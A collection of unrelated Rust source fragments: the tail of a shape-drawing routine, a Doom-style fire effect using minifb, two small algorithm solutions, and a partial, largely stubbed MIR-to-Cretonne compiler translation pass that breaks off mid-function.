        // NOTE(review): for STYLE_COMPLEX the gradient is stored in
        // buffers[1], so reading buffers[0] here looks wrong whenever
        // texpos and acolor are both present — confirm against the
        // style definitions.
        style.acolor.set(shape.buffers[0].as_ref().unwrap());
    }
    if !style.alpha.is_none() {
        style.alpha.set_vec1(shape.alpha.unwrap());
    }
    if !style.color.is_none() {
        style.color.set_vec4(&shape.color.unwrap());
    }
    // Fog on/off flag for the shader.
    if shape.has_fog {
        style.has_fog.set_int1(1);
    } else {
        style.has_fog.set_int1(0);
    }
    // Set vertices for the program from the vertex buffer.
    style.position.set(&shape.vertex_buffer);
    // Each fan is a half-open vertex range drawn as a triangle fan.
    for i in shape.fans.iter() {
        style.shader.draw_arrays(Topology::TriangleFan, i.0..i.1);
    }
}
|
use minifb::{Key, Scale, Window, WindowOptions};
use rand::{thread_rng, Rng};
// Grid dimensions of the fire simulation (also the window size,
// scaled up 4x in main()).
const ROWS: usize = 90;
const COLS: usize = 160;
// Fire palette (0x00RRGGBB), ordered coolest (near-black) to hottest
// (white); a FirePixel stores an index into this table.
const COLORS: [u32; 36] = [
    0x0007_0707,
    0x001f_0707,
    0x002f_0f07,
    0x0047_0f07,
    0x0057_1707,
    0x0067_1f07,
    0x0077_1f07,
    0x008f_2707,
    0x009f_2f07,
    0x00af_3f07,
    0x00bf_4707,
    0x00c7_4707,
    0x00df_4f07,
    0x00df_5707,
    0x00df_5707,
    0x00d7_5f07,
    0x00d7_670f,
    0x00cf_6f0f,
    0x00cf_770f,
    0x00cf_7f0f,
    0x00cf_8717,
    0x00c7_8717,
    0x00c7_8f17,
    0x00c7_971f,
    0x00bf_9f1f,
    0x00bf_9f1f,
    0x00bf_a727,
    0x00bf_a727,
    0x00bf_af2f,
    0x00b7_af2f,
    0x00b7_b72f,
    0x00b7_b737,
    0x00cf_cf6f,
    0x00df_df9f,
    0x00ef_efc7,
    0x00ff_ffff,
];
#[derive(Clone, Copy)]
struct FirePixel {
    // Palette index into `COLORS`; 0 is the darkest entry.
    index: usize,
}
impl FirePixel {
    /// Create a pixel at the bottom of the palette (black).
    fn new() -> Self {
        Self { index: 0 }
    }
}
// Fixed-size grid indexed [row][column]; row 0 is the heat source
// (drawn at the bottom of the window by State::draw).
type FireGrid = [[FirePixel; COLS]; ROWS];
struct State {
    // Current fire intensity for every cell.
    fire_grid: FireGrid,
}
impl State {
    /// Initialize a new state with a fire grid where all `FirePixel`s are black (index == 0), except for the first row,
    /// where all `FirePixels` are at full heat (index = MAX_COLOR).
    fn new() -> State {
        let mut fire_grid = [[FirePixel::new(); COLS]; ROWS];
        // Row 0 is the permanent heat source: hottest palette entry.
        fire_grid[0] = [FirePixel {
            index: COLORS.len() - 1,
        }; COLS];
        State { fire_grid }
    }
    /// Advance one tick: every cell above the source row pulls heat
    /// from a neighboring cell below via `spread_fire`.
    fn update(&mut self) {
        for y in 1..ROWS {
            for x in 0..COLS {
                spread_fire(y, x, &mut self.fire_grid)
            }
        }
    }
    /// Render the grid into a row-major u32 pixel buffer, flipping
    /// vertically so the heat source (grid row 0) lands at the bottom.
    fn draw(&self, buffer: &mut [u32]) {
        for (y, row) in self.fire_grid.iter().enumerate() {
            for (x, fire_pixel) in row.iter().enumerate() {
                let color = COLORS[fire_pixel.index];
                // Flip: grid row 0 maps to the last buffer row.
                let y = ROWS - y - 1;
                buffer[x + y * COLS] = color;
            }
        }
    }
}
/// Propagate heat into `fire_grid[target_y][target_x]` from a randomly
/// chosen source cell at or below it, losing a random amount of heat.
///
/// `target_y` must be >= 1 (row 0 is the permanent heat source), which
/// `State::update` guarantees.
fn spread_fire(target_y: usize, target_x: usize, fire_grid: &mut FireGrid) {
    let mut rng = thread_rng();
    // heat source
    let src_index = {
        /* heat can go sideways, so we accept the following ranges:
        - y: [-1, 0]
        - x: [-1, +1] (must check boundaries)
        */
        let source_x = {
            let modifier = rng.gen_range(-1, 2);
            let cols = COLS as isize;
            // Wrap around horizontally instead of clamping at the edges.
            ((target_x as isize + modifier + cols) % cols) as usize
            // or use mod_euc, which hasn't been stabilized yet
        };
        let source_y = target_y - rng.gen_range(0, 2);
        let source_fire_pixel = &fire_grid[source_y][source_x];
        source_fire_pixel.index
    };
    // fire pixel visited by this iteration
    // (removed the unneeded `mut` on the binding: mutating through an
    // `&mut` reference does not require a mutable binding)
    let target_fire_pixel = &mut fire_grid[target_y][target_x];
    let decay = rng.gen_range(0, 2);
    // saturating_sub keeps the palette index from underflowing past 0.
    target_fire_pixel.index = src_index.saturating_sub(decay);
}
/// Entry point: run the Doom-style fire effect in a minifb window until
/// it is closed or Escape is pressed.
pub fn main() -> minifb::Result<()> {
    let mut state = State::new();
    // One u32 pixel per grid cell.
    let mut buffer = [0; ROWS * COLS];
    let mut window = Window::new(
        "doom-fire",
        COLS,
        ROWS,
        WindowOptions {
            // Scale the small grid up 4x for visibility.
            scale: Scale::X4,
            ..WindowOptions::default()
        },
    )?;
    while window.is_open() && !window.is_key_down(Key::Escape) {
        state.update();
        state.draw(&mut buffer);
        window.update_with_buffer(&buffer)?;
    }
    Ok(())
}
|
use proconio::{fastout, input};
#[fastout]
fn main() {
    // Read n points and the distance threshold d from stdin.
    input! {
        n: usize,
        d: i64,
        x_y: [(i64, i64); n],
    };
    // Compare squared distances against d^2 — no square roots needed.
    let d2 = d.pow(2);
    let ans = x_y
        .iter()
        .filter(|&&(x, y)| x.pow(2) + y.pow(2) <= d2)
        .count();
    println!("{}", ans);
}
|
/// LeetCode 375 "Guess Number Higher or Lower II": minimum amount of
/// money that guarantees a win when guessing a number in 1..=n.
///
/// Interval DP: `dp[lo][hi]` is the guaranteed cost for the range
/// [lo, hi]; a guess `g` costs `g` plus the worse of the two halves.
pub fn get_money_amount(n: i32) -> i32 {
    let n = n as usize;
    let mut dp = vec![vec![0usize; n + 1]; n + 1];
    // Widen the interval one step at a time so sub-answers exist.
    for span in 1..=n {
        for lo in 1..=(n - span) {
            let hi = lo + span;
            let mut best = 1usize << 30;
            for guess in lo..hi {
                let worst_half = std::cmp::max(dp[lo][guess - 1], dp[guess + 1][hi]);
                best = std::cmp::min(best, guess + worst_half);
            }
            dp[lo][hi] = best;
        }
    }
    dp[1][n] as i32
}
extern crate cretonne;
extern crate cton_frontend;
use error::*;
use rustc::mir::{Mir, Local};
use rustc::mir::{UnOp, BinOp, Literal, Lvalue, Operand, ProjectionElem, Rvalue, AggregateKind,
CastKind, StatementKind, TerminatorKind};
use rustc::dep_graph::DepNode;
use rustc::middle::const_val::ConstVal;
use rustc_const_math::{ConstInt, ConstIsize};
use rustc::ty::{self, TyCtxt, Ty, FnSig};
use rustc::ty::layout::{self, Layout, Size};
use rustc::ty::subst::Substs;
use rustc::hir::intravisit::{self, Visitor, FnKind, NestedVisitorMap};
use rustc::hir::{FnDecl, BodyId};
use rustc::hir::def_id::DefId;
use rustc::traits::Reveal;
use syntax::ast::{NodeId, IntTy, UintTy, FloatTy};
use syntax::codemap::Span;
use std::ptr;
use std::collections::HashMap;
use std::cell::RefCell;
use monomorphize;
use traits;
use rustc_data_structures::indexed_vec::Idx;
use self::cretonne::ir::condcodes::IntCC;
use self::cretonne::ir::InstBuilder;
use std::u32;
/// User-facing options for the MIR -> Cretonne translation pass.
#[derive(Debug, Clone)]
pub struct Mir2CretonneTransOptions {
    /// Run Cretonne optimization passes (not yet consulted in this module).
    pub optimize: bool,
    /// Print the translated functions (currently an unimplemented stub).
    pub print: bool,
    /// Path to write binary output to, if any.
    pub binary_output_path: Option<String>,
}
impl Mir2CretonneTransOptions {
    /// Default options: no optimization, print enabled, no binary output.
    pub fn new() -> Mir2CretonneTransOptions {
        Mir2CretonneTransOptions {
            optimize: false,
            print: true,
            binary_output_path: None,
        }
    }
}
/// Walk every item-like in the crate with a `CretonneModuleCtxt`
/// visitor and collect the translated Cretonne functions.
fn visit_krate<'g, 'tcx>(
    tcx: TyCtxt<'g, 'tcx, 'tcx>,
    entry_fn: Option<NodeId>,
) -> Vec<cretonne::ir::Function> {
    let mut context: CretonneModuleCtxt = CretonneModuleCtxt::new(tcx, entry_fn);
    tcx.hir.krate().visit_all_item_likes(
        &mut context.as_deep_visitor(),
    );
    context.functions
}
/// Translate the whole crate to Cretonne IR.
///
/// Verification, optimization and output emission are still TODO;
/// `options.print` currently panics as unimplemented.
pub fn trans_crate<'a, 'tcx>(
    tcx: TyCtxt<'a, 'tcx, 'tcx>,
    entry_fn: Option<NodeId>,
    options: &Mir2CretonneTransOptions,
) -> Result<()> {
    // Keep the dep-graph from tracking reads made during translation.
    let _ignore = tcx.dep_graph.in_ignore();
    let functions = visit_krate(tcx, entry_fn);
    // TODO: Run the Cretonne verifier.
    // TODO: Run Cretonne optimization passes.
    if options.print {
        panic!("Unimplemented: print the functions");
    }
    // TODO: Emit output.
    Ok(())
}
/// Crate-wide translation state shared across all functions.
struct CretonneModuleCtxt<'b, 'gcx: 'b + 'tcx, 'tcx: 'b> {
    tcx: TyCtxt<'b, 'gcx, 'tcx>,
    /// NodeId of the crate's entry function, if any.
    entry_fn: Option<NodeId>,
    /// Cache of declared function signatures.
    fun_types: HashMap<ty::FnSig<'gcx>, cretonne::ir::SigRef>,
    /// Names of already-translated (DefId, signature) pairs; doubles
    /// as the "seen" set that prevents re-translation.
    fun_names: HashMap<(DefId, ty::FnSig<'gcx>), String>,
    /// Completed Cretonne functions.
    functions: Vec<cretonne::ir::Function>,
}
impl<'c, 'gcx: 'c + 'tcx, 'tcx: 'c> CretonneModuleCtxt<'c, 'gcx, 'tcx> {
    /// Create an empty per-crate translation context.
    fn new(
        tcx: TyCtxt<'c, 'gcx, 'tcx>,
        entry_fn: Option<NodeId>,
    ) -> CretonneModuleCtxt<'c, 'gcx, 'tcx> {
        CretonneModuleCtxt {
            // Field-init shorthand (was `tcx: tcx` / `entry_fn: entry_fn`).
            tcx,
            entry_fn,
            fun_types: HashMap::new(),
            fun_names: HashMap::new(),
            functions: Vec::new(),
        }
    }
}
impl<'e, 'tcx: 'e, 'h> Visitor<'h> for CretonneModuleCtxt<'e, 'tcx, 'tcx> {
    // No nested visit map: items arrive via visit_all_item_likes.
    fn nested_visit_map<'this>(&'this mut self) -> NestedVisitorMap<'this, 'h> {
        NestedVisitorMap::None
    }
    /// Translate one HIR function into Cretonne IR (skipping generic
    /// functions for now), then keep walking nested items.
    fn visit_fn(&mut self, fk: FnKind<'h>, fd: &'h FnDecl, b: BodyId, s: Span, id: NodeId) {
        let did = self.tcx.hir.local_def_id(id);
        let generics = self.tcx.generics_of(did);
        // don't translate generic functions yet
        if generics.types.len() + generics.parent_types as usize > 0 {
            return;
        }
        let mir = self.tcx.optimized_mir(did);
        let sig = self.tcx.fn_sig(did);
        let sig = sig.skip_binder();
        let mut func = cretonne::ir::Function::new();
        let mut il_builder = cton_frontend::ILBuilder::new();
        let mut func_builder = cton_frontend::FunctionBuilder::new(&mut func, &mut il_builder);
        {
            // Scoped so the &mut borrows of the module-level maps end
            // before walk_fn below re-borrows self.
            let mut ctxt = CretonneFnCtxt {
                tcx: self.tcx,
                mir: mir,
                did: did,
                sig: sig,
                builder: &mut func_builder,
                entry_fn: self.entry_fn,
                fun_types: &mut self.fun_types,
                fun_names: &mut self.fun_names,
                checked_op_local: None,
                var_map: Vec::new(),
                temp_map: Vec::new(),
                ret_var: None,
            };
            ctxt.trans();
        }
        intravisit::walk_fn(self, fk, fd, b, s, id)
    }
}
// An opaque reference to local variable in Rust.
// Used as the variable handle type for cton_frontend's FunctionBuilder.
#[derive(Copy, Clone, PartialEq, Eq, Hash, Debug)]
struct Variable(u32);
impl cretonne::entity_ref::EntityRef for Variable {
    /// Build a `Variable` from a dense index; indices must fit in u32.
    fn new(index: usize) -> Self {
        assert!(index < (u32::MAX as usize));
        Variable(index as u32)
    }
    /// Recover the dense index.
    fn index(self) -> usize {
        self.0 as usize
    }
}
impl Default for Variable {
    /// `u32::MAX` acts as the "no variable" sentinel (a real index
    /// never reaches it — see the assert in `EntityRef::new`).
    fn default() -> Variable {
        Variable(u32::MAX)
    }
}
/// Per-function translation state; lives only while one function's MIR
/// is being lowered to Cretonne IR.
struct CretonneFnCtxt<'f: 'g, 'g, 'd, 'gcx: 'd + 'tcx, 'tcx: 'd> {
    tcx: TyCtxt<'d, 'gcx, 'tcx>,
    /// MIR of the function being translated.
    mir: &'d Mir<'tcx>,
    /// DefId of the function being translated.
    did: DefId,
    sig: &'d FnSig<'gcx>,
    /// SSA builder producing the output Cretonne function.
    builder: &'g mut cton_frontend::FunctionBuilder<'f, Variable>,
    entry_fn: Option<NodeId>,
    /// Module-wide caches, borrowed from CretonneModuleCtxt.
    fun_types: &'d mut HashMap<ty::FnSig<'gcx>, cretonne::ir::SigRef>,
    fun_names: &'d mut HashMap<(DefId, ty::FnSig<'gcx>), String>,
    checked_op_local: Option<u32>,
    /// Local maps: MIR locals are laid out [return, args, vars, temps]
    /// (see `get_local_index`); `None` marks locals with no Cretonne
    /// value type (unit/never).
    var_map: Vec<Option<usize>>,
    temp_map: Vec<Option<usize>>,
    ret_var: Option<usize>,
}
impl<'f: 'g, 'g, 'd, 'gcx: 'd + 'tcx, 'tcx: 'd> CretonneFnCtxt<'f, 'g, 'd, 'gcx, 'tcx> {
    /// Number of formal arguments of the function being translated.
    fn num_args(&self) -> usize {
        self.sig.inputs().len()
    }
    /// Resolve a MIR local index to its Cretonne variable slot.
    ///
    /// MIR's flat local index space is: 0 = return place, then the
    /// arguments, then user variables, then temporaries.  Returns
    /// `None` for locals that got no Cretonne variable.
    fn get_local_index(&self, i: usize) -> Option<usize> {
        debug!("fetching local {:?}", i);
        debug!(" vars: {:?}", self.var_map);
        debug!(" temps: {:?}", self.temp_map);
        if i == 0 {
            debug!("returning retvar");
            return self.ret_var;
        }
        // Shift past the return place.
        let i = i - 1;
        if i < self.num_args() {
            debug!("returning function arg {}", i);
            return Some(i);
        }
        // Shift past the arguments.
        let i = i - self.num_args();
        if i < self.var_map.len() {
            debug!("returning {}th local: {:?}", i, self.var_map[i]);
            return self.var_map[i];
        }
        // Shift past the user variables; what remains must be a temp.
        let i = i - self.var_map.len();
        assert!(i < self.temp_map.len());
        debug!("returning {}th temp: {:?}", i, self.temp_map[i]);
        self.temp_map[i]
    }
}
impl<'f: 'g, 'g, 'd, 'tcx: 'd> CretonneFnCtxt<'f, 'g, 'd, 'tcx, 'tcx> {
/// This is the main entry point for MIR->cretonne fn translation
///
/// Bails out if this (DefId, signature) pair was translated already,
/// then walks every MIR basic block, lowering statements and
/// terminators through `self.builder`.  Many paths are still
/// `panic!` stubs.
fn trans(&mut self) {
    let mir = self.mir;
    // Maintain a cache of translated monomorphizations and bail
    // if we've already seen this one.
    use std::collections::hash_map::Entry::*;
    match self.fun_names.entry((self.did, *self.sig)) {
        Occupied(_) => return,
        Vacant(entry) => {
            let fn_name = sanitize_symbol(&self.tcx.item_path_str(self.did));
            entry.insert(fn_name);
        }
    }
    debug!("translating fn {:?}", self.tcx.item_path_str(self.did));
    // Translate arg and ret tys to cretonne
    for ty in self.sig.inputs() {
        if let Some(cton_ty) = rust_ty_to_cretonne(ty) {
            panic!("Unimplemented: function arguments");
        }
    }
    let ret_ty = self.sig.output();
    debug!("ret_ty is {:?}", ret_ty);
    let cretonne_ret = rust_ty_to_cretonne(ret_ty);
    // Fixed: `needs_ret_var` was a `let mut` with a dead `false`
    // initializer that was immediately overwritten; bind it once.
    let needs_ret_var = cretonne_ret.is_some();
    debug!("needs_ret_var = {:?}", needs_ret_var);
    // Create the wasm vars.
    // Params and vars form the list of locals, both sharing the same index space.
    // TODO: Use mir.local_decls directly rather than the two iterators.
    for mir_var in mir.vars_iter() {
        debug!(
            "adding local {:?}: {:?}",
            mir_var,
            mir.local_decls[mir_var].ty
        );
        match rust_ty_to_cretonne(mir.local_decls[mir_var].ty) {
            Some(cton_ty) => {
                panic!("Unimplemented: local variables");
            }
            // Zero-sized locals get no Cretonne variable.
            None => self.var_map.push(None),
        }
    }
    for mir_var in mir.temps_iter() {
        debug!("adding temp {:?}", mir_var);
        panic!("Unimplemented: temporary variables");
    }
    if needs_ret_var {
        debug!("adding ret var");
        panic!("Unimplemented: return variables");
    }
    debug!("{} MIR basic blocks to translate", mir.basic_blocks().len());
    for (i, bb) in mir.basic_blocks().iter().enumerate() {
        debug!("bb{}: {:#?}", i, bb);
        let mut cretonne_stmts = Vec::new();
        // Lower the block's statements; only Assign does real work.
        for stmt in &bb.statements {
            match stmt.kind {
                StatementKind::Assign(ref lvalue, ref rvalue) => {
                    self.trans_assignment(lvalue, rvalue, &mut cretonne_stmts);
                }
                StatementKind::StorageLive(_) => {}
                StatementKind::StorageDead(_) => {}
                _ => panic!("{:?}", stmt.kind),
            }
        }
        let block_kind = CretonneBlockKind::Default;
        // Lower the block terminator.
        match bb.terminator().kind {
            TerminatorKind::Return => {
                // TODO: Emit function epilogue, if necessary.
                debug!(
                    "emitting Return from fn {:?}",
                    self.tcx.item_path_str(self.did)
                );
                if ret_ty.is_nil() {
                    self.builder.ins().return_(&[]);
                } else {
                    // Local 0 is guaranteed to be return pointer
                    let v = self.trans_operand(&Operand::Consume(Lvalue::Local(Local::new(0))));
                    self.builder.ins().return_(&[v]);
                }
            }
            TerminatorKind::Call {
                ref func,
                ref args,
                ref destination,
                ..
            } => {
                panic!("Unimplemented: terminator calls");
            }
            TerminatorKind::Goto { ref target } => {
                debug!(
                    "emitting Branch for Goto, from bb{} to bb{}",
                    i,
                    target.index()
                );
                panic!("Unimplemented: Goto");
            }
            TerminatorKind::Assert { ref target, .. } => {
                // TODO: An assert is not a GOTO!!!
                // Fix this!
                debug!(
                    "emitting Branch for Goto, from bb{} to bb{}",
                    i,
                    target.index()
                );
                panic!("Unimplemented: Assert");
            }
            _ => (),
        }
    }
    // Declare the function's signature once per distinct FnSig.
    if !self.fun_types.contains_key(self.sig) {
        let name = format!("rustfn-{}-{}", self.did.krate, self.did.index.as_u32());
        panic!("Unimplemented: declare function type");
        /*self.fun_types.insert(*self.sig, ty);*/
    }
    let nid = self.tcx.hir.as_local_node_id(self.did).expect("");
    if Some(self.did) == self.tcx.lang_items.panic_fn() {
        // TODO: when it's possible to print characters or interact with the environment,
        // also handle #[lang = "panic_fmt"] to support panic messages
        debug!("emitting Unreachable function for panic lang item");
        panic!("Unimplemented: panic lang item");
    } else {
        // Create the function prologue
        // TODO: the epilogue and prologue are not always necessary
        debug!("emitting function prologue");
        panic!("Unimplemented: function prologue");
    }
    debug!(
        "done translating fn {:?}\n",
        self.tcx.item_path_str(self.did)
    );
}
/// Lower one MIR `Assign` statement into Cretonne IR.
///
/// Resolves the destination lvalue first (bailing out for zero-sized
/// destinations), then dispatches on the rvalue kind.  Destinations
/// with a byte `offset` write through a pointer local; destinations
/// without one write the SSA variable directly.  Emitted values that
/// need sequencing are pushed onto `statements`.
fn trans_assignment(
    &mut self,
    lvalue: &Lvalue<'tcx>,
    rvalue: &Rvalue<'tcx>,
    statements: &mut Vec<cretonne::ir::Value>,
) {
    let mir = self.mir;
    let dest = match self.trans_lval(lvalue) {
        Some(dest) => dest,
        None => {
            // TODO: the rvalue may have some effects that we need to preserve. For example,
            // reading from memory can cause a fault.
            debug!(
                "trans_assignment lval is unit: {:?} = {:?}; skipping",
                lvalue,
                rvalue
            );
            return;
        }
    };
    let dest_ty = lvalue.ty(&*mir, self.tcx).to_ty(self.tcx);
    let dest_layout = self.type_layout(dest_ty);
    match *rvalue {
        // Plain copy/move of an operand into the destination.
        Rvalue::Use(ref operand) => {
            let src = self.trans_operand(operand);
            let statement = match dest.offset {
                Some(offset) => {
                    debug!(
                        "emitting Store + GetLocal({}) for Assign Use '{:?} = {:?}'",
                        dest.index,
                        lvalue,
                        rvalue
                    );
                    let ptr = self.builder.use_var(Variable(dest.index));
                    // TODO: match on the dest_ty to know how many bytes to write, not just
                    // i32s
                    panic!("Unimplemented: rvalues");
                    /*
                    CretonneStore(self.func.module.module,
                    4,
                    offset,
                    0,
                    ptr,
                    src,
                    CretonneInt32())
                    */
                }
                None => {
                    debug!(
                        "emitting SetLocal({}) for Assign Use '{:?} = {:?}'",
                        dest.index,
                        lvalue,
                        rvalue
                    );
                    panic!("Unimplemented: set_local for assign use");
                    /*
                    CretonneSetLocal(self.func.module.module, dest.index, src)
                    */
                }
            };
            statements.push(statement);
        }
        // Unary operators; only logical-not is handled so far.
        Rvalue::UnaryOp(ref op, ref operand) => {
            let mut operand = self.trans_operand(operand);
            operand = match *op {
                // `!x` as an integer compare-with-zero.
                UnOp::Not => self.builder.ins().icmp_imm(IntCC::Equal, operand, 0),
                _ => panic!("unimplemented UnOp: {:?}", op),
            };
            self.builder.def_var(Variable(dest.index), operand);
        }
        Rvalue::BinaryOp(ref op, ref left, ref right) => {
            let left = self.trans_operand(left);
            let right = self.trans_operand(right);
            // TODO: match on dest_ty.sty to implement binary ops for other types than just
            // integers
            // TODO: check if the dest_layout is signed or not (CEnum, etc)
            // TODO: comparisons are signed only for now, so implement unsigned ones
            let op = match *op {
                BinOp::Add => self.builder.ins().iadd(left, right),
                BinOp::Sub => self.builder.ins().isub(left, right),
                BinOp::Mul => self.builder.ins().imul(left, right),
                BinOp::Div => self.builder.ins().sdiv(left, right),
                BinOp::BitAnd => self.builder.ins().band(left, right),
                BinOp::BitOr => self.builder.ins().bor(left, right),
                BinOp::BitXor => self.builder.ins().bxor(left, right),
                BinOp::Eq => self.builder.ins().icmp(IntCC::Equal, left, right),
                BinOp::Ne => self.builder.ins().icmp(IntCC::NotEqual, left, right),
                BinOp::Lt => self.builder.ins().icmp(IntCC::SignedLessThan, left, right),
                BinOp::Le => {
                    self.builder.ins().icmp(
                        IntCC::SignedLessThanOrEqual,
                        left,
                        right,
                    )
                }
                BinOp::Gt => {
                    self.builder.ins().icmp(
                        IntCC::SignedGreaterThan,
                        left,
                        right,
                    )
                }
                BinOp::Ge => {
                    self.builder.ins().icmp(
                        IntCC::SignedGreaterThanOrEqual,
                        left,
                        right,
                    )
                }
                _ => panic!("unimplemented BinOp: {:?}", op),
            };
            match dest.offset {
                // Destination is behind a pointer: emit a store.
                Some(offset) => {
                    debug!(
                        "emitting Store + GetLocal({}) for Assign BinaryOp '{:?} = \
                        {:?}'",
                        dest.index,
                        lvalue,
                        rvalue
                    );
                    let ptr = self.builder.use_var(Variable(dest.index));
                    // TODO: Set the trap/align flags.
                    let memflags = cretonne::ir::MemFlags::new();
                    let memoffset = cretonne::ir::immediates::Offset32::new(offset as i32);
                    // TODO: match on the dest_ty to know how many bytes to write, not just
                    // i32s
                    self.builder.ins().store(memflags, op, ptr, memoffset);
                }
                // Plain SSA variable destination.
                None => {
                    debug!(
                        "emitting SetLocal({}) for Assign BinaryOp '{:?} = {:?}'",
                        dest.index,
                        lvalue,
                        rvalue
                    );
                    self.builder.def_var(Variable(dest.index), op);
                }
            }
        }
        Rvalue::CheckedBinaryOp(ref op, ref left, ref right) => {
            panic!("Unimplemented: Checked binary op");
        }
        Rvalue::Ref(_, _, ref lvalue) => {
            // TODO: for shared refs only ?
            // TODO: works for refs to "our stack", but not the locals on the wasm stack yet
            let expr = self.trans_operand(&Operand::Consume(lvalue.clone()));
            debug!(
                "emitting SetLocal({}) for Assign Ref '{:?} = {:?}'",
                dest.index,
                lvalue,
                rvalue
            );
            self.builder.def_var(Variable(dest.index), expr);
        }
        Rvalue::Aggregate(ref kind, ref operands) => {
            panic!("Unimplemented Rvalue::Aggregate");
        }
        Rvalue::Cast(ref kind, ref operand, _) => {
            if dest.offset.is_some() {
                panic!("unimplemented '{:?}' Cast with offset", kind);
            }
            match *kind {
                CastKind::Misc => {
                    let src = self.trans_operand(operand);
                    let src_ty = operand.ty(&*mir, self.tcx);
                    let src_layout = self.type_layout(src_ty);
                    // TODO: handle more of the casts (miri doesn't really handle every Misc
                    // cast either right now)
                    // Scalar/CEnum -> int casts are value-preserving
                    // here, so just forward the source value.
                    match (src_layout, &dest_ty.sty) {
                        (&Layout::Scalar { .. }, &ty::TyInt(_)) |
                        (&Layout::Scalar { .. }, &ty::TyUint(_)) => {
                            debug!(
                                "emitting SetLocal({}) for Scalar Cast Assign '{:?} = \
                                {:?}'",
                                dest.index,
                                lvalue,
                                rvalue
                            );
                            self.builder.def_var(Variable(dest.index), src);
                        }
                        (&Layout::CEnum { .. }, &ty::TyInt(_)) |
                        (&Layout::CEnum { .. }, &ty::TyUint(_)) => {
                            debug!(
                                "emitting SetLocal({}) for CEnum Cast Assign '{:?} = {:?}'",
                                dest.index,
                                lvalue,
                                rvalue
                            );
                            self.builder.def_var(Variable(dest.index), src);
                        }
                        _ => {
                            panic!(
                                "unimplemented '{:?}' Cast '{:?} = {:?}', for {:?} to {:?}",
                                kind,
                                lvalue,
                                rvalue,
                                src_layout,
                                dest_ty.sty
                            )
                        }
                    }
                }
                _ => {
                    panic!(
                        "unimplemented '{:?}' Cast '{:?} = {:?}'",
                        kind,
                        lvalue,
                        rvalue
                    )
                }
            }
        }
        _ => panic!("unimplemented Assign '{:?} = {:?}'", lvalue, rvalue),
    }
}
// TODO this function changed from being passed offsets-after-field to offsets-of-field...
// but I suspect it still does the right thing - emit a store for every field.
// Did it miss the first field and emit after the last field of the struct before?
/// Emit one store per aggregate field (currently an unimplemented
/// stub; the intended logic survives in the commented-out body).
fn emit_assign_fields<I>(
    &mut self,
    offsets: I,
    operands: &[Operand<'tcx>],
    statements: &mut Vec<cretonne::ir::Value>,
) where
    I: IntoIterator<Item = u64>,
{
    panic!("Unimplemented: assign_fields");
    /*
    for (offset, operand) in offsets.into_iter().zip(operands) {
        // let operand_ty = mir.operand_ty(*self.tcx, operand);
        // TODO: match on the operand_ty to know how many bytes to store, not just i32s
        let src = self.trans_operand(operand);
        let write_field = CretonneStore(self.func.module.module,
            4,
            offset as u32,
            0,
            read_sp,
            src,
            CretonneInt32());
        statements.push(write_field);
    }
    */
}
/// Resolve a MIR lvalue to a local index plus optional byte offset.
///
/// Returns `None` for zero-sized lvalues that have no Cretonne
/// variable.  Field and Downcast projections fold their layout
/// offsets into the result; Deref without an offset passes through.
fn trans_lval(&mut self, lvalue: &Lvalue<'tcx>) -> Option<CretonneLvalue> {
    let mir = self.mir;
    debug!("translating lval: {:?}", lvalue);
    let i = match *lvalue {
        Lvalue::Local(i) => {
            match self.get_local_index(i.index()) {
                Some(i) => i as u32,
                // Zero-sized local: nothing to address.
                None => return None,
            }
        }
        Lvalue::Projection(ref projection) => {
            // Resolve the base lvalue first, then refine it.
            let base = match self.trans_lval(&projection.base) {
                Some(base) => base,
                None => return None,
            };
            let base_ty = projection.base.ty(&*mir, self.tcx).to_ty(self.tcx);
            let base_layout = self.type_layout(base_ty);
            match projection.elem {
                ProjectionElem::Deref => {
                    if base.offset.is_none() {
                        return Some(CretonneLvalue::new(base.index, None, LvalueExtra::None));
                    }
                    panic!("unimplemented Deref {:?}", lvalue);
                }
                ProjectionElem::Field(ref field, _) => {
                    // Pick the variant whose field offsets apply.
                    let variant = match *base_layout {
                        Layout::Univariant { ref variant, .. } => variant,
                        Layout::General { ref variants, .. } => {
                            if let LvalueExtra::DowncastVariant(variant_idx) = base.extra {
                                &variants[variant_idx]
                            } else {
                                panic!("field access on enum had no variant index");
                            }
                        }
                        _ => panic!("unimplemented Field Projection: {:?}", projection),
                    };
                    let offset = variant.offsets[field.index()].bytes() as u32;
                    return Some(
                        CretonneLvalue::new(base.index, base.offset, LvalueExtra::None)
                            .offset(offset),
                    );
                }
                ProjectionElem::Downcast(_, variant) => {
                    match *base_layout {
                        Layout::General { discr, .. } => {
                            assert!(
                                base.offset.is_none(),
                                "unimplemented Downcast Projection with offset"
                            );
                            // Skip past the discriminant to the payload.
                            let offset = discr.size().bytes() as u32;
                            return Some(CretonneLvalue::new(
                                base.index,
                                Some(offset),
                                LvalueExtra::DowncastVariant(variant),
                            ));
                        }
                        _ => panic!("unimplemented Downcast Projection: {:?}", projection),
                    }
                }
                _ => panic!("unimplemented Projection: {:?}", projection),
            }
        }
        _ => panic!("unimplemented Lvalue: {:?}", lvalue),
    };
    // Plain local with no offset or downcast info.
    Some(CretonneLvalue::new(
        i as CretonneIndex,
        None,
        LvalueExtra::None,
    ))
}
/// Lower a MIR operand to a Cretonne SSA value.
///
/// Lvalue reads with a byte offset load through the pointer local;
/// plain locals read the SSA variable; constants become `iconst` /
/// `bconst` instructions.
fn trans_operand(&mut self, operand: &Operand<'tcx>) -> cretonne::ir::Value {
    let mir = self.mir;
    match *operand {
        Operand::Consume(ref lvalue) => {
            let cretonne_lvalue = match self.trans_lval(lvalue) {
                Some(lval) => lval,
                None => {
                    debug!("operand lval is unit: {:?}", operand);
                    panic!("Unimplemented: unit lvalues");
                }
            };
            let lval_ty = lvalue.ty(&*mir, self.tcx);
            let t = lval_ty.to_ty(self.tcx);
            let t = rust_ty_to_cretonne(t);
            match cretonne_lvalue.offset {
                // Offset present: load from [local + offset].
                Some(offset) => {
                    debug!(
                        "emitting GetLocal({}) + Load for '{:?}'",
                        cretonne_lvalue.index,
                        lvalue
                    );
                    let ptr = self.builder.use_var(Variable(cretonne_lvalue.index));
                    // TODO: match on the field ty to know how many bytes to read, not just
                    // i32s
                    // TODO: Set the trap/align flags.
                    let memflags = cretonne::ir::MemFlags::new();
                    let memoffset = cretonne::ir::immediates::Offset32::new(offset as i32);
                    self.builder.ins().load(
                        cretonne::ir::types::I32,
                        memflags,
                        ptr,
                        memoffset,
                    )
                }
                None => {
                    // debug!("emitting GetLocal for '{:?}'", lvalue);
                    self.builder.use_var(Variable(cretonne_lvalue.index))
                }
            }
        }
        Operand::Constant(ref c) => {
            match c.literal {
                Literal::Value { ref value } => {
                    // TODO: handle more Rust types here
                    match *value {
